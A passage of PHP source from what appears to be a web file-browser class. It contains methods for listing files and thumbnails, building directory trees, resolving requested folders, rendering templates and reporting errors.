array(); $files = dir::content($dir, array('types' => "file")); if ($files === false) return $return; foreach ($files as $file) { $size = @getimagesize($file); if (is_array($size) && count($size)) { $thumb_file = "$thumbDir/" . basename($file); if (!is_file($thumb_file)) $this->makeThumb($file, false); $smallThumb = ($size[0] <= $this->config['thumbWidth']) && ($size[1] <= $this->config['thumbHeight']) && in_array($size[2], array(IMAGETYPE_GIF, IMAGETYPE_PNG, IMAGETYPE_JPEG)); } else $smallThumb = false; $stat = stat($file); if ($stat === false) continue; $name = basename($file); $ext = file::getExtension($file); $bigIcon = file_exists("themes/{$this->config['theme']}/img/files/big/$ext.png"); $smallIcon = file_exists("themes/{$this->config['theme']}/img/files/small/$ext.png"); $thumb = file_exists("$thumbDir/$name"); $return[] = array( 'name' => stripcslashes($name), 'size' => $stat['size'], 'mtime' => $stat['mtime'], 'date' => @strftime($this->dateTimeSmall, $stat['mtime']), 'readable' => is_readable($file), 'writable' => file::isWritable($file), 'bigIcon' => $bigIcon, 'smallIcon' => $smallIcon, 'thumb' => $thumb, 'smallThumb' => $smallThumb ); } return $return; } protected function getTree($dir, $index=0) { $path = explode("/", $dir); $pdir = ""; for ($i = 0; ($i <= $index && $i < count($path)); $i++) $pdir .= "/{$path[$i]}"; if (strlen($pdir)) $pdir = substr($pdir, 1); $fdir = "{$this->config['uploadDir']}/$pdir"; $dirs = $this->getDirs($fdir); if (is_array($dirs) && count($dirs) && ($index <= count($path) - 1)) { foreach ($dirs as $i => $cdir) { if ($cdir['hasDirs'] && ( ($index == count($path) - 1) || ($cdir['name'] == $path[$index + 1]) ) ) { $dirs[$i]['dirs'] = $this->getTree($dir, $index + 1); if (!is_array($dirs[$i]['dirs']) || !count($dirs[$i]['dirs'])) { unset($dirs[$i]['dirs']); continue; } } } } else return false; return $dirs; } protected function postDir($existent=true) { $dir = $this->typeDir; if (isset($this->post['dir'])) $dir .= "/" . $this->post['dir']; if ($existent && (!is_dir($dir) || !is_readable($dir))) $this->errorMsg("Inexistant or inaccessible folder."); return $dir; } protected function getDir($existent=true) { $dir = $this->typeDir; if (isset($this->get['dir'])) $dir .= "/" . $this->get['dir']; if ($existent && (!is_dir($dir) || !is_readable($dir))) $this->errorMsg("Inexistant or inaccessible folder."); return $dir; } protected function getDirs($dir) { $dirs = dir::content($dir, array('types' => "dir")); $return = array(); if (is_array($dirs)) { $writable = dir::isWritable($dir); foreach ($dirs as $cdir) { $info = $this->getDirInfo($cdir); if ($info === false) continue; $info['removable'] = $writable && $info['writable']; $return[] = $info; } } return $return; } protected function getDirInfo($dir, $removable=false) { if ((substr(basename($dir), 0, 1) == ".") || !is_dir($dir) || !is_readable($dir)) return false; $dirs = dir::content($dir, array('types' => "dir")); if (is_array($dirs)) { foreach ($dirs as $key => $cdir) if (substr(basename($cdir), 0, 1) == ".") unset($dirs[$key]); $hasDirs = count($dirs) ? true : false; } else $hasDirs = false; $writable = dir::isWritable($dir); $info = array( 'name' => stripslashes(basename($dir)), 'readable' => is_readable($dir), 'writable' => $writable, 'removable' => $removable && $writable && dir::isWritable(dirname($dir)), 'hasDirs' => $hasDirs ); if ($dir == "{$this->config['uploadDir']}/{$this->session['dir']}") $info['current'] = true; return $info; } protected function output($data=null, $template=null) { if (!is_array($data)) $data = array(); if ($template === null) $template = $this->action; if (file_exists("tpl/tpl_$template.php")) { ob_start(); $eval = "unset(\$data);unset(\$template);unset(\$eval);"; $_ = $data; foreach (array_keys($data) as $key) if (preg_match('/^[a-z\d_]+$/i', $key)) $eval .= "\$$key=\$_['$key'];"; $eval .= "unset(\$_);require \"tpl/tpl_$template.php\";"; eval($eval); return ob_get_clean(); } return ""; } protected function errorMsg($message, array $data=null) { if (in_array($this->action, array("thumb", "upload", "download", "downloadDir"))) die($this->label($message, $data)); if (($this->action === null) || ($this->action == "browser")) $this->backMsg($message, $data); else { $message = $this->label($message, $data); die(json_encode(array('error' => $message))); } } } ?>